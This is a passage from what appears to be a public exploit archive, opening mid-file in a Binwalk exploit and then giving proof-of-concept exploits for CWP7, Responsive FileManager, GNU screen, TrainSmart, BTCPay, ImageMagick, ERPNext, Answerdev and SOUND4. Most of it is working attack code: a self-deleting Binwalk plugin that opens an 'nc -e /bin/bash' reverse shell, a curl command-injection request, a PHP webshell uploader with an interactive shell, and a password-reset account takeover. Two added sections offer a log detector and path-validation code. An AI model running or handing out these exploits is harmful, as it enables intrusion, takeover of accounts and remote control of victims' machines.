    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")

    # The plugin binwalk will load: first run spawns the reverse shell and leaves a
    # marker; the second run removes the marker, the plugin and its __pycache__
    lines = ['import binwalk.core.plugin\n',
             'import os\n',
             'import shutil\n',
             'class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',
             '    def init(self):\n',
             '        if not os.path.exists("/tmp/.binwalk"):\n',
             '            os.system("nc ', str(args.ip) + ' ', str(args.port) + ' ', '-e /bin/bash 2>/dev/null &")\n',
             '            with open("/tmp/.binwalk", "w") as f:\n',
             '                f.write("1")\n',
             '        else:\n',
             '            os.remove("/tmp/.binwalk")\n',
             '            os.remove(os.path.abspath(__file__))\n',
             '            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']

    in_file = open(args.file, "rb")
    data = in_file.read()
    in_file.close()

    with open("/tmp/plugin", "w") as f:
        for line in lines:
            f.write(line)
    with open("/tmp/plugin", "rb") as f:
        content = f.read()
    os.system("rm /tmp/plugin")

    # valid PNG first so the file still looks like an image, then the PFS archive
    with open("binwalk_exploit.png", "wb") as f:
        f.write(data)
        f.write(header_pfs)
        f.write(content)

    print("")
    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
    print("")
-
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
//
// The "login" query parameter of /login/index.php ends up in a shell command:
// $(...) runs curl against the listener, with ${IFS} standing in for the space
// the URL cannot carry, so a hit on the listener confirms execution.

package main

import (
	"bytes"
	"crypto/tls"
	"flag"
	"fmt"
	"net/http"
	"time"
)

func main() {
	var host, call string
	flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
	flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
	flag.Parse()

	banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)
`
	fmt.Print(banner)
	fmt.Println("[*] Triggering cURL command")
	fmt.Println("[*] Open Listener on " + call)

	// Skip certificate validation
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	client := &http.Client{Transport: tr}

	// Request URL: the injected command lives in the query string, not the form body
	url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"

	// Request body (placeholder credentials)
	body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))

	// Create HTTP client and send POST request
	req, err := http.NewRequest("POST", url, body)
	if err != nil {
		fmt.Println("Error building request:", err)
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("Error sending request:", err)
		return
	}
	defer resp.Body.Close()

	time.Sleep(2 * time.Second)
	fmt.Println("\n[*] Check Listener for OOB callback")
}
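Because the injected command travels in the query string of a login request, it is visible in ordinary web-server access logs. The following added example (Python, standard library only; not CWP's code and not part of the advisory) scans constructed common-log-format lines for requests to /login/index.php whose `login` value contains shell syntax, percent-decoding the value the way the server would. The sample lines are made up for the example; the second and third reproduce the `$(curl${IFS}...)` shape used above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not real CWP logs). Lines 2 and 3 carry the
# CVE-2022-44877 pattern; line 3 has it URL-encoded as a browser or tool would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Feb/2023:10:00:01 +0000] "POST /login/index.php?login=admin HTTP/1.1" 302 0
10.0.0.9 - - [02/Feb/2023:10:00:07 +0000] "POST /login/index.php?login=$(curl${IFS}127.0.0.1:8020) HTTP/1.1" 302 0
10.0.0.9 - - [02/Feb/2023:10:00:09 +0000] "POST /login/index.php?login=%24%28id%29 HTTP/1.1" 302 0
10.0.0.7 - - [02/Feb/2023:10:00:12 +0000] "GET /login/index.php?login=failed HTTP/1.1" 200 1234
"""

# Request line inside the quotes of a CLF entry
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# $(...) and backticks are command substitution; ${IFS} is the usual stand-in for a
# space inside a URL; ';' and '|' chain commands. '&' is deliberately absent: it is
# the query-string separator and never survives inside a single parameter value.
SHELL_SYNTAX_RE = re.compile(r"\$\(|`|\$\{IFS\}|[;|]")


def query_values(query: str, key: str):
    """Yield every value of `key` in a raw query string, percent-decoded once.
    The log keeps the request line as sent, so decoding happens after splitting
    on '&', never before (an encoded %26 must not become a separator)."""
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if k == key:
            yield unquote_plus(v)


def suspicious_login_requests(log_text: str) -> list:
    """Return (client_ip, decoded_login_value) for each request to
    /login/index.php whose 'login' parameter contains shell syntax."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != "/login/index.php":
            continue
        client_ip = line.split(" ", 1)[0]
        for value in query_values(target.query, "login"):
            if SHELL_SYNTAX_RE.search(value):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_login_requests(SAMPLE_LOG):
        print(f"{ip}  login={value!r}")
```

The same two-step shape (isolate the parameter, then decode and match) applies to any logged GET parameter; matching the raw line would miss the encoded variant on line 3.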
-
Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
# Date: 02-Feb-2023
# Exploit Author: Galoget Latorre (@galoget)
# Vendor Homepage: https://responsivefilemanager.com
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip
# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604
# Version: 9.9.5
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2022.3 64-bit
# CVE: CVE-2022-46604 (Konstantin Burov)

#!/usr/bin/python3
# -*- coding:utf-8 -*-

import sys
import requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint

# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py 127.0.0.1


def banner():
    """ Function to print the banner """
    banner_text = """
 _____ _____ _____         ___ ___ ___ ___         ___ ___ ___ ___ ___
|     |  |  |   __|  ___  |_  |   |_  |_  |  ___  | | |  _|  _|   | | |
|   --|  |  |   __| |___| |  _| | |  _|  _| |___| |_  | . | . | | |_  |
|_____|\\___/|_____|       |___|___|___|___|         |_|___|___|___| |_|

    File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE)
    Exploit Author: Galoget Latorre (@galoget)
    CVE Author: Konstantin Burov
    """
    print(banner_text)


def usage_instructions():
    """ Function that validates the number of arguments.
    The application MUST have 2 arguments:
    - [0]: Name of the script
    - [1]: Target site, which can be a domain or an IP Address
    """
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <target.site>")
        print("Example: python3 exploit.py 127.0.0.1")
        sys.exit(0)


def run_command(web_session, webshell_url, command_to_run):
    """ Function that:
    - Interacts with the webshell to run a command
    - Cleans the response of the webshell
    - Returns the response object and the output of the command
    """
    # passed as a query parameter so spaces and special characters are encoded
    webshell_response = web_session.get(url=webshell_url, params={"cmd": command_to_run}, headers=headers)
    command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser')
    return (webshell_response, command_output_soup.find('pre').text)


if __name__ == "__main__":
    banner()
    usage_instructions()

    # Change this with the domain or IP address to attack
    if sys.argv[1]:
        host = sys.argv[1]
    else:
        host = "127.0.0.1"

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
    }

    # URL to create a new file
    target_url = f"http://{host}/filemanager/execute.php?action=create_file"

    # Change this to customize the payload (i.e. the content of the malicious file that will be created)
    payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>"
    # oneliner_payload = " <?=`$_GET[_]`?>"

    # URL to get a PHPSESSID value
    cookie_url = f"http://{host}/filemanager/dialog.php"

    # New Session
    session = requests.Session()

    # GET request to retrieve a PHPSESSID value
    cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue")
    try:
        session.get(url=cookie_url, headers=headers)
    except requests.RequestException:
        cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red")
        sys.exit(0)

    if session.cookies.get_dict():
        cprint("[+] PHPSESSID retrieved correctly.", "green")
        cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow")
    else:
        cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red")

    # Params, rename if you want. This is the bypass from the title: "name" carries an
    # allowed extension (.txt) while "path" names the .php file that is actually written.
    params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload}

    # POST request to create the webshell
    cprint(f"\n[*] Attempting to create a webshell on {host}", "blue")
    response = session.post(url=target_url, headers=headers, data=params)

    # If the status code and the message match, we may have a webshell inside. ;)
    if response.status_code == 200 and response.text == "File successfully saved.":
        # Default webshell path
        shell_url = f"http://{host}/source/shell.php"

        # Verify if the shell was uploaded by running whoami and cat /etc/passwd
        webshell, whoami_output = run_command(session, shell_url, "whoami")
        webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd")

        # Common users when getting a webshell
        common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"]

        # Verify if the command was executed correctly
        if webshell.status_code == 200 or whoami_output.strip().lower() in common_users or "root:x:0:0:" in passwd_output:
            cprint("[+] Webshell uploaded - Enjoy!", "green")
            cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow")
            cprint(f"[+] Running `whoami` command: {whoami_output}", "green")

            # Ask to enter into a pseudo-interactive mode with the webshell
            answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta"))
            if answer.upper() == "Y":
                cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue")
                command = ""
                while command.lower() != "exit":
                    # keep the command's case; only the exit keyword is compared case-insensitively
                    command = input(colored(">> ", "cyan")).strip()
                    if command.lower() != "exit":
                        webshell, command_output = run_command(session, shell_url, command)
                        cprint(command_output, "cyan")
            cprint("\n[*] Exiting...Bye!", "blue")
    elif response.status_code == 403 and response.text == "The file is already existing":
        cprint("[-] The file that you're trying to create is already on the server.", "red")
    else:
        cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red")
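Two entries on this page come down to trusting a caller-supplied file name when deciding where and what to write: the Binwalk PFS entry named `../../../.config/binwalk/plugins/binwalk.py` escapes the extraction directory, and the Responsive FileManager request above gets its extension check applied to `name=shell.txt` while the file is written to `path=shell.php` (with `path_thumb=../thumbs/shell.php` escaping as well). The following is an added example, not code from either project or advisory, of the two checks a file-writing endpoint or extractor needs: containment under a base directory and an extension policy evaluated on the path that is actually written. The base directories and the allowed-extension set are assumptions for the example.

```python
import posixpath


class UnsafePath(ValueError):
    """Raised for any caller-supplied path that must not be written."""


def resolve_under(base_dir: str, user_path: str) -> str:
    """Join a caller-supplied relative path onto base_dir and refuse anything that
    escapes it: '../' segments (the Binwalk PFS entry name), absolute paths, NUL
    bytes. Pure string logic, so it is testable without touching the disk; the
    caller still has to open the result with O_NOFOLLOW/O_EXCL to defeat symlinks."""
    if not user_path:
        raise UnsafePath("empty path")
    if "\x00" in user_path:
        raise UnsafePath("NUL byte in path")
    if posixpath.isabs(user_path) or user_path.startswith("\\"):
        raise UnsafePath("absolute path not allowed")
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, user_path))
    # commonpath is the containment test; target.startswith(base) would accept /out2 for /out
    if posixpath.commonpath([base, target]) != base:
        raise UnsafePath(f"{user_path!r} escapes {base_dir!r}")
    return target


def extensions_of(filename: str) -> list:
    """Every dot-suffix of a filename, lowercased: 'shell.php.txt' -> ['.php', '.txt'].
    Servers with AddHandler-style mappings may execute x.php.txt, so each one counts."""
    parts = filename.lower().split(".")
    return ["." + p for p in parts[1:]]


ALLOWED_EXTENSIONS = {".txt", ".md", ".csv"}   # assumed policy for the example


def resolve_created_file(base_dir: str, path: str, name: str,
                         allowed=ALLOWED_EXTENSIONS) -> str:
    """Model of a hardened create_file: the extension check runs on the path that is
    actually written (not on the display name), every suffix must be allowed, and
    name and path must agree, so path=shell.php with name=shell.txt is refused."""
    target = resolve_under(base_dir, path)
    exts = extensions_of(posixpath.basename(target))
    if not exts or any(e not in allowed for e in exts):
        raise UnsafePath(f"extension of {path!r} not allowed")
    if extensions_of(posixpath.basename(name)) != exts:
        raise UnsafePath(f"name {name!r} and path {path!r} disagree on extension")
    return target


if __name__ == "__main__":
    # The Binwalk PFS entry name and the FileManager parameters from this page
    for candidate in ("etc/passwd", "../../../.config/binwalk/plugins/binwalk.py"):
        try:
            print("extract ->", resolve_under("/srv/extract", candidate))
        except UnsafePath as err:
            print("refused :", err)
    for path, name in (("notes.txt", "notes.txt"), ("shell.php", "shell.txt"),
                       ("../thumbs/shell.php", "shell.txt")):
        try:
            print("create  ->", resolve_created_file("/var/www/source", path, name))
        except UnsafePath as err:
            print("refused :", err)
```

Doing the checks on the normalised final path rather than on the user-visible name is the whole point: a name-only check is exactly what the FileManager request sidesteps, and an extractor that joins entry names without containment is exactly what the PFS file abuses.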
-
GNU screen v4.9.0 - Privilege Escalation
# Exploit Title: GNU screen v4.9.0 - Privilege Escalation
# Date: 03.02.2023
# Exploit Author: Manuel Andreas
# Vendor Homepage: https://www.gnu.org/software/screen/
# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz
# Version: 4.9.0
# Tested on: Arch Linux
# CVE : CVE-2023-24626
#
# A setuid-root screen passes the pid carried in a MSG_QUERY message to kill()
# with SIGHUP without checking that the caller is allowed to signal that process.
# The PoC starts its own screen instance, connects to its socket and sends such a
# message with an arbitrary target pid.

import os
import socket
import struct
import argparse
import subprocess
import pty
import time

SOCKDIR_TEMPLATE = "/run/screens/S-{}"
MAXPATHLEN = 4096
MAXTERMLEN = 32
MAXLOGINLEN = 256
STRUCTSIZE = 12584   # sizeof(struct msg) on the tested build
MSG_QUERY = 9


def find_latest_socket(dir):
    return f"{dir}/{sorted(os.listdir(dir))[-1]}"


def build_magic(ver=5):
    # 'm' 's' 'g' followed by the protocol version byte
    return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver


def build_msg(type):
    # struct msg header: protocol magic, message type, m_tty[MAXPATHLEN]
    return struct.pack("<ii", build_magic(), type) + MAXPATHLEN * b"T"


def build_query(auser, nargs, cmd, apid, preselect, writeback):
    # layout of the 'query' member of the union inside struct msg
    assert(len(auser) == MAXLOGINLEN + 1)
    assert(len(cmd) == MAXPATHLEN)
    assert(len(preselect) == 20)
    assert(len(writeback) == MAXPATHLEN)
    buf = build_msg(MSG_QUERY)
    buf += auser
    buf += 3 * b"\x00"  # Padding
    buf += struct.pack("<i", nargs)
    buf += cmd
    buf += struct.pack("<i", apid)  # the pid screen will SIGHUP
    buf += preselect
    buf += writeback
    # Union padding
    buf += (STRUCTSIZE - len(buf)) * b"P"
    return buf


def spawn_screen_instance():
    # provide a pty
    mo, so = pty.openpty()
    me, se = pty.openpty()
    mi, si = pty.openpty()
    screen = subprocess.Popen("/usr/bin/screen", bufsize=0, stdin=si, stdout=so, stderr=se, close_fds=True, env={"TERM": "xterm"})
    for fd in [so, se, si]:
        os.close(fd)
    return screen


def main():
    parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.')
    parser.add_argument('pid', type=int, help='the pid to receive the signal')
    args = parser.parse_args()
    pid = args.pid
    username = os.getlogin()

    screen = spawn_screen_instance()
    print("Waiting a second for screen to setup its socket..")
    time.sleep(1)

    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username))
    print(f"Connecting to: {socket_path}")
    s.connect(socket_path)

    print('Sending message...')
    msg = build_query(username.encode('ascii') + (MAXLOGINLEN + 1 - len(username)) * b"\x00", 0, MAXPATHLEN * b"E", pid, 20 * b"\x00", MAXPATHLEN * b"D")
    s.sendmsg([msg])
    s.recv(512)
    print(f'Ok sent SIGHUP to {pid}!')
    screen.kill()


if __name__ == '__main__':
    main()
-
itech TrainSmart r1044 - SQL injection
# Exploit Title: itech TrainSmart r1044 - SQL injection
# Date: 03.02.2023
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520

SQL injection vulnerability in itech TrainSmart r1044 allows remote attackers to view sensitive information via a crafted request, e.g. using sqlmap.

PoC:
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs
-
BTCPay Server v1.7.4 - HTML Injection
# Exploit Title: BTCPay Server v1.7.4 - HTML Injection
# Date: 01/26/2023
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Vendor Homepage: https://github.com/btcpayserver/btcpayserver
# Software Link: https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5
# Version: <=1.7.4
# Tested on: Windows10
# CVE : CVE-2023-0493

# Description:
BTCPay Server v1.7.4 HTML injection vulnerability.

# Steps to exploit:
1. Create an account on the target website. Register endpoint: https://target-website.com/register#
2. Go to the API keys page and create an API key with the HTML injection in the label field. Example: <a href="https://hackerbro.in">clickhere</a>
3. Click remove/delete API key; the HTML injection will render.
-
ImageMagick 7.1.0-49 - DoS
## Exploit Title: ImageMagick 7.1.0-49 - DoS
## Author: nu11secur1ty
## Date: 02.07.2023
## Vendor: https://imagemagick.org/
## Software: https://imagemagick.en.uptodown.com/windows/download/82953605
## Reference: https://portswigger.net/daily-swig/denial-of-service
## CVE-ID: CVE-2022-44267

## Description:
ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input. The attacker can easily send a malicious PNG file to the victim, and when the victim opens this PNG the program will crash.

STATUS: HIGH Vulnerability

[+] Payload:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC)

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267)

## Proof and Exploit:
[href](https://streamable.com/l7z79c)

## Time spent: 00:30:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
-
ERPNext 12.29 - Cross-Site Scripting (XSS)
# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS)
# Date: 7 Feb 2023
# Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla
# Github - https://github.com/patrickdeanramos/CVE-2022-28598
# Vendor Homepage: https://erpnext.com/
# Version: 12.29
# CVE-2022-28598

Summary: A stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29, where the "last_known_version" field found in the "My Settings" page in ERPNext 12.29.0 allows remote attackers to inject arbitrary web script or HTML via a crafted site name by sending an authenticated POST HTTP request to '/desk#Form/User/(Authenticated User)' and injecting the script in the 'last_known_version' field; the script executes when the 'pdf' view of the form is opened. This vulnerability is specifically in the "last_known_version" field found under 'My Settings', where the settings must first be saved.

1. Login as any user.
2. Under the 'last_known_version' field, inject the malicious script.
3. To view the injected script, click the view PDF page; as seen below, the script has been successfully injected.
-
Answerdev 1.0.3 - Account Takeover
# Exploit Title: Answerdev 1.0.3 - Account Takeover
# Date: Reported on Jan 24th 2023
# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp
# Vendor Homepage: https://answer.dev/
# Software Link: https://github.com/answerdev/answer
# Version: 1.0.3
# Tested on: Ubuntu 22.04 / Debian 11
# CVE : CVE-2023-0744

from sys import argv
import urllib3
from requests import post

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def ato(url: list, email: str) -> str:
    # The reset endpoint returns the password-reset code in the JSON "data" field,
    # so the reset link for any account can be built without access to its mailbox.
    try:
        return f"Your Link: {''.join(url)}users/password-reset?code=" + \
            post(f"{''.join(url)}answer/api/v1/user/password/reset",
                 json={"e_mail": email}, verify=False).json()["data"]
    except Exception as err:
        return f"Cant reach URL: {err}"


if __name__ == "__main__":
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/ [email protected]")
        exit()
    print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))
-
SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow
# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow
# Exploit Author: LiquidWorm

Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: 1.1.2

Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that allows users to remotely control SOUND4 processors through a network connection. SOUND4 offers a tool that manages sending L&S commands to your processors: the Link&Share Transmitter.

Desc: The application suffers from a format string memory leak and stack buffer overflow vulnerability because it fails to properly sanitize user-supplied input when calling the getenv() function from MSVCR120.DLL, resulting in a crash that overflows the stack and leaks sensitive information. The attacker can abuse the username environment variable to trigger the crash and potentially execute code on the affected system.

---------------------------------------------------------------------------
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h --------------------------------------------------------------------------- Tested on: Microsoft Windows 10 Home Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5744 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php 26.09.2022 -- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file 02/02/23 17:06:19 : Background launch: User: 
